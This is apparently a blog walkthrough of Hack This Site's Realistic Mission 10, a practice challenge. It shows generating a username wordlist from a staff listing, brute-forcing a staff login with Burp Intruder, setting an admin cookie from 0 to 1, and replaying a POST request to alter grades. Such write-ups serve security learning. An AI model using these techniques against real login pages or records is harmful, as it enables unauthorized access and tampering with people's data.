Oh hello, fancy seeing you here. Today we’re looking at Hack This Site Realistic Web Mission 10. In other words, we’re going to demonstrate how not to implement authentication mechanisms. Overall, this mission was a lot of fun. It required creating a wordlist from a list of publicly listed teachers. Then, we used that wordlist to brute force the login page to gain access to the staff control panel. Once logged in, we had to flag ourselves as an admin by modifying our cookies. Then, we modified a post request to change the grades. If you haven’t seen my other posts on the realistic series you can do so here: Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 and, Part 8
Poor Zach Sanchez is having a difficult time at school. In fact, he may not be able to graduate because his grades are too poor. As a result, he has messaged us to ask whether we could hack into his school’s online grade database and change his grades. Additionally, He has provided us with his username and password to allow us to explore the application.
Exploring The Web Application
The application is fairly basic, it has three links at the top and one halfway down the page. As can be seen from the image below, there isn’t a lot of functionality. For instance, the home button returns you to the home page, the staff listing takes you to a list of users, and the student access system takes you to a login page.
If we click on the Student Access System we are presented with a login page that requests a username and password. Zach provided us with his login credentials so let’s test them out and see what it gives us access to.
Upon login in as Zach, we don’t get a lot of increased functionality. As seen from the image below, we can view his classes, his grades, and any comments left by the teacher. Not a lot we can do here to change his grades.
If we head back to the homepage and view the page source of the application, there is a reference to a page that isn’t displayed on the home page. Notably, this page is named staff.php which indicates that it could be a page that staff members use to log in. Perhaps we can use this page to access and change Zach’s grades.
Web Application Brute Force
When visiting the staff.php page we’re presented with a login form. While we have a login page, we don’t have any credentials to use to log in. I’ve explored the application in detail and couldn’t find any additional information.
However, we do have a list of staff members on the teacher listing page. With this in mind, perhaps we could use this list to identify genuine users of the application. First I copied the user’s first and last names into a text file and saved it as usernames.txt.
Next, I cloned the username-anarchy repository from GitHub. As soon as the repository was downloaded I told it to generate a wordlist using the first name and last name, first initial and last name, and a few other combinations. I then saved the results.
Josephs-MacBook-Pro:username-anarchy Joe$ sudo ./username-anarchy --input-file /Users/Joe/Desktop/usernames.txt --select-format first,first.last,f.last,flast adam adam.smith a.smith asmith alfred alfred.johnson a.johnson ajohnson corey corey.beelke c.beelke cbeelke edward edward.anderson e.anderson eanderson gordon gordon.freeman g.freeman gfreeman henry henry.mathison h.mathison hmathison
I then refreshed the login page to capture the log-in request with Burp Suite. Once the request was captured, I sent it to the intruder tool. I then removed the automatically generated payload positions and highlighted the username and password parameter values and added the payload positions.
Launching The Attack
I selected the attack type, then pasted in the values from the wordlist in positions 1 and 2 on the payloads tab. With the attack ready, I clicked the launch attack button.
After waiting around for a while, we found the correct username and password combination. As you can see from the image below, the response length from the application is different when the correct credentials are submitted. When the incorrect credentials are submitted the response lengths are all the same (1876). This is because the response from the server is the same. However, when the correct credentials are submitted, the response length is different because it is loading the page.
With the correct credentials, we can now log in to the staff area as Samantha Miller. This area of the application appears to give us some more functionality but unfortunately, our access to it is restricted as we’re not an administrator.
In order to elevate our privileges to that of an administrator, we need to inspect the page and look at our cookies. We could intercept the request with Burp and change them for every request but that would make our life more difficult. The image below illustrates changing the value of the admin cookie from a 0 to a 1.
Now that we have administrator privileges we can access the change grades option. Unfortunately, it is too late to change the grades as they are about to be mailed out. However, if we view the source code of the application we can see that there is a POST method that includes a change grades function.
If we copy the POST request and modify it slightly, we can send it to Burp Repeater and use it to change the grades. The snippet of code below shows the post request with the values that need to be modified highlighted in bold. Change the grade value to 5 and then change the rec value to 0 and send the request, then increase the rec value by 1 and send the request again.
You can keep modifying and sending the request until the response changes from grade submitted to the congratulations message for completing the mission.
And with that, you should have completed the message.